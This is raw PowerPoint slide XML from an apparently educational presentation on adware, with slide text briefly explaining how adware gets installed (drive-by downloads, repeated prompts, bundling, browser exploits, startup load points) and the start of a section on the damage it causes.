                      <a:pt x="1245" y="53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4" name="Rectangle 216"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId2"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1768736" y="1481527"/>
                <a:ext cx="38164" cy="28450"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:pr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11" name="Rectangle 218"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId3"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3560379" y="1481527"/>
                <a:ext cx="40940" cy="28450"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:pr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6" name="Freeform 219"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId4"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1872127" y="1278214"/>
                <a:ext cx="179719" cy="191517"/>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6 h 28"/>
                  <a:gd name="T12" fmla="*/ 6 w 28"/>
                  <a:gd name="T13" fmla="*/ 14 h 28"/>
                  <a:gd name="T14" fmla="*/ 14 w 28"/>
                  <a:gd name="T15" fmla="*/ 22 h 28"/>
                  <a:gd name="T16" fmla="*/ 22 w 28"/>
                  <a:gd name="T17" fmla="*/ 14 h 28"/>
                  <a:gd name="T18" fmla="*/ 14 w 28"/>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6"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="6"/>
                      <a:pt x="6" y="10"/>
                      <a:pt x="6" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="19"/>
                      <a:pt x="10" y="22"/>
                      <a:pt x="14" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="22"/>
                      <a:pt x="22" y="19"/>
                      <a:pt x="22" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="10"/>
                      <a:pt x="19" y="6"/>
                      <a:pt x="14"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8" name="Freeform 220"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId5"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2215606" y="1278214"/>
                <a:ext cx="185271" cy="191517"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 15 w 29"/>
                  <a:gd name="T1" fmla="*/ 28 h 28"/>
                  <a:gd name="T2" fmla="*/ 0 w 29"/>
                  <a:gd name="T3" fmla="*/ 14 h 28"/>
                  <a:gd name="T4" fmla="*/ 15 w 29"/>
                  <a:gd name="T5" fmla="*/ 0 h 28"/>
                  <a:gd name="T6" fmla="*/ 29 w 29"/>
                  <a:gd name="T7" fmla="*/ 14 h 28"/>
                  <a:gd name="T8" fmla="*/ 15 w 29"/>
                  <a:gd name="T9" fmla="*/ 28 h 28"/>
                  <a:gd name="T10" fmla="*/ 15 w 29"/>
                  <a:gd name="T11" fmla="*/ 6 h 28"/>
                  <a:gd name="T12" fmla="*/ 7 w 29"/>
                  <a:gd name="T13" fmla="*/ 14 h 28"/>
                  <a:gd name="T14" fmla="*/ 15 w 29"/>
                  <a:gd name="T15" fmla="*/ 22 h 28"/>
                  <a:gd name="T16" fmla="*/ 23 w 29"/>
                  <a:gd name="T17" fmla="*/ 14 h 28"/>
                  <a:gd name="T18" fmla="*/ 15 w 29"/>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28"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="28"/>
                      <a:pt x="0" y="22"/>
                      <a:pt x="0" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="6"/>
                      <a:pt x="7" y="0"/>
                      <a:pt x="15" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="0"/>
                      <a:pt x="29" y="6"/>
                      <a:pt x="29" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="22"/>
                      <a:pt x="23" y="28"/>
                      <a:pt x="15" y="28"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="15" y="6"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="6"/>
                      <a:pt x="7" y="10"/>
                      <a:pt x="7" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="19"/>
                      <a:pt x="10" y="22"/>
                      <a:pt x="15" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="22"/>
                      <a:pt x="23" y="19"/>
                      <a:pt x="23" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="10"/>
                      <a:pt x="19" y="6"/>
                      <a:pt x="15"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10" name="Freeform 221"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId6"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2910197" y="1278214"/>
                <a:ext cx="182495" cy="191517"/>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6 h 28"/>
                  <a:gd name="T12" fmla="*/ 6 w 28"/>
                  <a:gd name="T13" fmla="*/ 14 h 28"/>
                  <a:gd name="T14" fmla="*/ 14 w 28"/>
                  <a:gd name="T15" fmla="*/ 22 h 28"/>
                  <a:gd name="T16" fmla="*/ 22 w 28"/>
                  <a:gd name="T17" fmla="*/ 14 h 28"/>
                  <a:gd name="T18" fmla="*/ 14 w 28"/>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6"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="6"/>
                      <a:pt x="6" y="10"/>
                      <a:pt x="6" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="19"/>
                      <a:pt x="10" y="22"/>
                      <a:pt x="14" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="22"/>
                      <a:pt x="22" y="19"/>
                      <a:pt x="22" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="10"/>
                      <a:pt x="18" y="6"/>
                      <a:pt x="14"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23" name="Freeform 222"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId7"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3252982" y="1278214"/>
                <a:ext cx="185271" cy="191517"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 15 w 29"/>
                  <a:gd name="T1" fmla="*/ 28 h 28"/>
                  <a:gd name="T2" fmla="*/ 0 w 29"/>
                  <a:gd name="T3" fmla="*/ 14 h 28"/>
                  <a:gd name="T4" fmla="*/ 15 w 29"/>
                  <a:gd name="T5" fmla="*/ 0 h 28"/>
                  <a:gd name="T6" fmla="*/ 29 w 29"/>
                  <a:gd name="T7" fmla="*/ 14 h 28"/>
                  <a:gd name="T8" fmla="*/ 15 w 29"/>
                  <a:gd name="T9" fmla="*/ 28 h 28"/>
                  <a:gd name="T10" fmla="*/ 15 w 29"/>
                  <a:gd name="T11" fmla="*/ 6 h 28"/>
                  <a:gd name="T12" fmla="*/ 6 w 29"/>
                  <a:gd name="T13" fmla="*/ 14 h 28"/>
                  <a:gd name="T14" fmla="*/ 15 w 29"/>
                  <a:gd name="T15" fmla="*/ 22 h 28"/>
                  <a:gd name="T16" fmla="*/ 23 w 29"/>
                  <a:gd name="T17" fmla="*/ 14 h 28"/>
                  <a:gd name="T18" fmla="*/ 15 w 29"/>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28"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="28"/>
                      <a:pt x="0" y="22"/>
                      <a:pt x="0" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="6"/>
                      <a:pt x="7" y="0"/>
                      <a:pt x="15" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="0"/>
                      <a:pt x="29" y="6"/>
                      <a:pt x="29" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="22"/>
                      <a:pt x="22" y="28"/>
                      <a:pt x="15" y="28"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="15" y="6"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="6"/>
                      <a:pt x="6" y="10"/>
                      <a:pt x="6" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="19"/>
                      <a:pt x="10" y="22"/>
                      <a:pt x="15" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="22"/>
                      <a:pt x="23" y="19"/>
                      <a:pt x="23" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="10"/>
                      <a:pt x="19" y="6"/>
                      <a:pt x="15"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29" name="Freeform 223"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId8"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2490389" y="1183843"/>
                <a:ext cx="324050" cy="326134"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 12 w 50"/>
                  <a:gd name="T1" fmla="*/ 48 h 48"/>
                  <a:gd name="T2" fmla="*/ 10 w 50"/>
                  <a:gd name="T3" fmla="*/ 47 h 48"/>
                  <a:gd name="T4" fmla="*/ 9 w 50"/>
                  <a:gd name="T5" fmla="*/ 44 h 48"/>
                  <a:gd name="T6" fmla="*/ 11 w 50"/>
                  <a:gd name="T7" fmla="*/ 30 h 48"/>
                  <a:gd name="T8" fmla="*/ 1 w 50"/>
                  <a:gd name="T9" fmla="*/ 21 h 48"/>
                  <a:gd name="T10" fmla="*/ 1 w 50"/>
                  <a:gd name="T11" fmla="*/ 18 h 48"/>
                  <a:gd name="T12" fmla="*/ 3 w 50"/>
                  <a:gd name="T13" fmla="*/ 16 h 48"/>
                  <a:gd name="T14" fmla="*/ 17 w 50"/>
                  <a:gd name="T15" fmla="*/ 14 h 48"/>
                  <a:gd name="T16" fmla="*/ 23 w 50"/>
                  <a:gd name="T17" fmla="*/ 2 h 48"/>
                  <a:gd name="T18" fmla="*/ 28 w 50"/>
                  <a:gd name="T19" fmla="*/ 2 h 48"/>
                  <a:gd name="T20" fmla="*/ 34 w 50"/>
                  <a:gd name="T21" fmla="*/ 14 h 48"/>
                  <a:gd name="T22" fmla="*/ 48 w 50"/>
                  <a:gd name="T23" fmla="*/ 16 h 48"/>
                  <a:gd name="T24" fmla="*/ 50 w 50"/>
                  <a:gd name="T25" fmla="*/ 18 h 48"/>
                  <a:gd name="T26" fmla="*/ 49 w 50"/>
                  <a:gd name="T27" fmla="*/ 21 h 48"/>
                  <a:gd name="T28" fmla="*/ 40 w 50"/>
                  <a:gd name="T29" fmla="*/ 30 h 48"/>
                  <a:gd name="T30" fmla="*/ 42 w 50"/>
                  <a:gd name="T31" fmla="*/ 44 h 48"/>
                  <a:gd name="T32" fmla="*/ 41 w 50"/>
                  <a:gd name="T33" fmla="*/ 47 h 48"/>
                  <a:gd name="T34" fmla="*/ 37 w 50"/>
                  <a:gd name="T35" fmla="*/ 47 h 48"/>
                  <a:gd name="T36" fmla="*/ 25 w 50"/>
                  <a:gd name="T37" fmla="*/ 41 h 48"/>
                  <a:gd name="T38" fmla="*/ 13 w 50"/>
                  <a:gd name="T39" fmla="*/ 47 h 48"/>
                  <a:gd name="T40" fmla="*/ 12 w 50"/>
                  <a:gd name="T41" fmla="*/ 48 h 48"/>
                  <a:gd name="T42" fmla="*/ 25 w 50"/>
                  <a:gd name="T43" fmla="*/ 34 h 48"/>
                  <a:gd name="T44" fmla="*/ 27 w 50"/>
                  <a:gd name="T45" fmla="*/ 35 h 48"/>
                  <a:gd name="T46" fmla="*/ 35 w 50"/>
                  <a:gd name="T47" fmla="*/ 39 h 48"/>
                  <a:gd name="T48" fmla="*/ 33 w 50"/>
                  <a:gd name="T49" fmla="*/ 30 h 48"/>
                  <a:gd name="T50" fmla="*/ 34 w 50"/>
                  <a:gd name="T51" fmla="*/ 27 h 48"/>
                  <a:gd name="T52" fmla="*/ 41 w 50"/>
                  <a:gd name="T53" fmla="*/ 21 h 48"/>
                  <a:gd name="T54" fmla="*/ 32 w 50"/>
                  <a:gd name="T55" fmla="*/ 20 h 48"/>
                  <a:gd name="T56" fmla="*/ 29 w 50"/>
                  <a:gd name="T57" fmla="*/ 18 h 48"/>
                  <a:gd name="T58" fmla="*/ 25 w 50"/>
                  <a:gd name="T59" fmla="*/ 10 h 48"/>
                  <a:gd name="T60" fmla="*/ 21 w 50"/>
                  <a:gd name="T61" fmla="*/ 18 h 48"/>
                  <a:gd name="T62" fmla="*/ 19 w 50"/>
                  <a:gd name="T63" fmla="*/ 20 h 48"/>
                  <a:gd name="T64" fmla="*/ 10 w 50"/>
                  <a:gd name="T65" fmla="*/ 21 h 48"/>
                  <a:gd name="T66" fmla="*/ 17 w 50"/>
                  <a:gd name="T67" fmla="*/ 27 h 48"/>
                  <a:gd name="T68" fmla="*/ 17 w 50"/>
                  <a:gd name="T69" fmla="*/ 30 h 48"/>
                  <a:gd name="T70" fmla="*/ 16 w 50"/>
                  <a:gd name="T71" fmla="*/ 39 h 48"/>
                  <a:gd name="T72" fmla="*/ 24 w 50"/>
                  <a:gd name="T73" fmla="*/ 35 h 48"/>
                  <a:gd name="T74" fmla="*/ 25 w 50"/>
                  <a:gd name="T75"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 h="48">
                    <a:moveTo>
                      <a:pt x="12" y="48"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="48"/>
                      <a:pt x="11" y="47"/>
                      <a:pt x="10" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="46"/>
                      <a:pt x="9" y="45"/>
                      <a:pt x="9" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="30"/>
                      <a:pt x="11" y="30"/>
                      <a:pt x="11" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="21"/>
                      <a:pt x="1" y="21"/>
                      <a:pt x="1" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="20"/>
                      <a:pt x="0" y="19"/>
                      <a:pt x="1" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="17"/>
                      <a:pt x="2" y="16"/>
                      <a:pt x="3" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="14"/>
                      <a:pt x="17" y="14"/>
                      <a:pt x="17" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="2"/>
                      <a:pt x="23" y="2"/>
                      <a:pt x="23" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="0"/>
                      <a:pt x="27" y="0"/>
                      <a:pt x="28" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="14"/>
                      <a:pt x="34" y="14"/>
                      <a:pt x="34" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="16"/>
                      <a:pt x="48" y="16"/>
                      <a:pt x="48" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="16"/>
                      <a:pt x="50" y="17"/>
                      <a:pt x="50" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="19"/>
                      <a:pt x="50" y="20"/>
                      <a:pt x="49" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="30"/>
                      <a:pt x="40" y="30"/>
                      <a:pt x="40" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="44"/>
                      <a:pt x="42" y="44"/>
                      <a:pt x="42" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="45"/>
                      <a:pt x="42" y="46"/>
                      <a:pt x="41" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="48"/>
                      <a:pt x="39" y="48"/>
                      <a:pt x="37" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="41"/>
                      <a:pt x="25" y="41"/>
                      <a:pt x="25" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="47"/>
                      <a:pt x="13" y="47"/>
                      <a:pt x="13" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="47"/>
                      <a:pt x="12" y="48"/>
                      <a:pt x="12" y="48"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="25" y="34"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="34"/>
                      <a:pt x="26" y="35"/>
                      <a:pt x="27" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="39"/>
                      <a:pt x="35" y="39"/>
                      <a:pt x="35" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="30"/>
                      <a:pt x="33" y="30"/>
                      <a:pt x="33" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="29"/>
                      <a:pt x="34" y="28"/>
                      <a:pt x="34" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="21"/>
                      <a:pt x="41" y="21"/>
                      <a:pt x="41" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="20"/>
                      <a:pt x="32" y="20"/>
                      <a:pt x="32" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="19"/>
                      <a:pt x="30" y="19"/>
                      <a:pt x="29" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="10"/>
                      <a:pt x="25" y="10"/>
                      <a:pt x="25" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="18"/>
                      <a:pt x="21" y="18"/>
                      <a:pt x="21" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="19"/>
                      <a:pt x="20" y="19"/>
                      <a:pt x="19" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="21"/>
                      <a:pt x="10" y="21"/>
                      <a:pt x="10" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="27"/>
                      <a:pt x="17" y="27"/>
                      <a:pt x="17" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="28"/>
                      <a:pt x="18" y="29"/>
                      <a:pt x="17" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="39"/>
                      <a:pt x="16" y="39"/>
                      <a:pt x="16" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="35"/>
                      <a:pt x="24" y="35"/>
                      <a:pt x="24" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="35"/>
                      <a:pt x="25" y="34"/>
                      <a:pt x="25" y="34"/>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pic>
            <p:nvPicPr>
              <p:cNvPr id="30" name="图形 17" descr="templates\docerresourceshop\icons\\32313535373331353b32313535373332313bc8cbb9a4d6c7c4dcbbfac6f7c8cb"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId9"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId10">
                <a:extLst>
                  <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                    <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId11"/>
                  </a:ext>
                </a:extLst>
              </a:blip>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="9804055" y="4285183"/>
                <a:ext cx="930275" cy="930275"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31"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12"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1783" y="3134"/>
              <a:ext cx="15383" cy="4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71500">
                <a:lnSpc>
                  <a:spcPts val="4500"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="1500"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzPct val="200000"/>
                <a:buFontTx/>
                <a:buBlip>
                  <a:blip r:embed="rId1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Adware is a type of software that displays advertisements on a computer or mobile device. Adware is typically installed along with free software and can be difficult to remove once it is on a system.</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20648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Install-Drive-by-downloading</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1905" y="1146175"/>
            <a:ext cx="11532870" cy="298069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20000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr/>
            </a:pP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usage of drive by downloading is the misleading methods utilized by adware developers. Drive by download</a:t>
            </a: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ing</a:t>
            </a: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is the act of provoking an individual to install software when the user browses the website without the individual in fact wishing</a:t>
            </a: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to</a:t>
            </a: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setup different software at the beginning.</a:t>
            </a:r>
            <a:endPar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20648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Install-Continuous Prompt</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78" name="折角形 377"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695643" y="1355090"/>
            <a:ext cx="10800715" cy="4051300"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 18909"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:sysClr val="window" lastClr="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="152400" dist="38100" dir="5400000" algn="t"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379" name="任意多边形 378"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1050290" y="1355090"/>
            <a:ext cx="428625" cy="36893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rgbClr val="07A7A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pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13" descr="2378 [转换]"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect l="-644" r="84596" b="8932"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="236220" y="4841875"/>
            <a:ext cx="1157605" cy="1620520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 63490" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030362c5c2274656d706c61746549645c223a32303233313234337d220a7d0a"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483870" y="1831975"/>
            <a:ext cx="10537190" cy="298069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10000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buBlip>
                <a:blip r:embed="rId6"/>
              </a:buBlip>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="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writer uses continu</a:t>
            </a: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ous</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="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prompting till the individuals give up and agree to install</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US"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software</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="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18171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Install-Bundled and Chained Installment</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1905" y="1146175"/>
            <a:ext cx="11532870" cy="447167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20000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr/>
            </a:pP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Bundling adware with a third party program is another widespread way. The technique of installing additional software is named as chained installs. The vast majority of people dislike adware but why such businesses use bundling technique in their application. The answer is profit. For instance, the amount of money could be from pennies to 0.25 dollars for each installment.</a:t>
            </a:r>
            <a:endPar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Install-Exploits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1905" y="1146175"/>
            <a:ext cx="11532870" cy="397383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20000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr/>
            </a:pP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users sometimes install some adware on their computers without their permission. That happens by abusing weaknesses in browsers that permit adware to be installed and run in an automatic way. The program downloaded consists of some piece of components that change the browser home page, show advertisements, and alter way of</a:t>
            </a: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searching results, monitor individual computer behaviors.</a:t>
            </a:r>
            <a:endPar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Install-Load Points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1905" y="1146175"/>
            <a:ext cx="11532870" cy="4436745"/>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20000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr/>
            </a:pP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When adware is set up on a computer, they need to make sure that they start when the system begins all the time. Some operat</a:t>
            </a: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ing</a:t>
            </a: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systems offer load points at different times throughout computer startup. There are load points for operating systems’ starts, when the user logs in, when </a:t>
            </a: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a:t>
            </a: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browser executes, and when </a:t>
            </a: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a:t>
            </a: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program execute</a:t>
            </a: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t>
            </a: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adware can employ a load point as a minimum to make sure continuity via restarts.</a:t>
            </a:r>
            <a:endPar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Damages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55" name="Text Box 8" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030362c5c2274656d706c61746549645c223a32303233313234337d222c0a20202020227461726765744964223a202270726f636573734f6e6c696e6542756c6c6574220a7d0a"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="203200" y="1113790"/>
            <a:ext cx="11568430" cy="5221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2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClrTx/>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Performance degradation:</a:t>
            </a:r>
            <a:r>
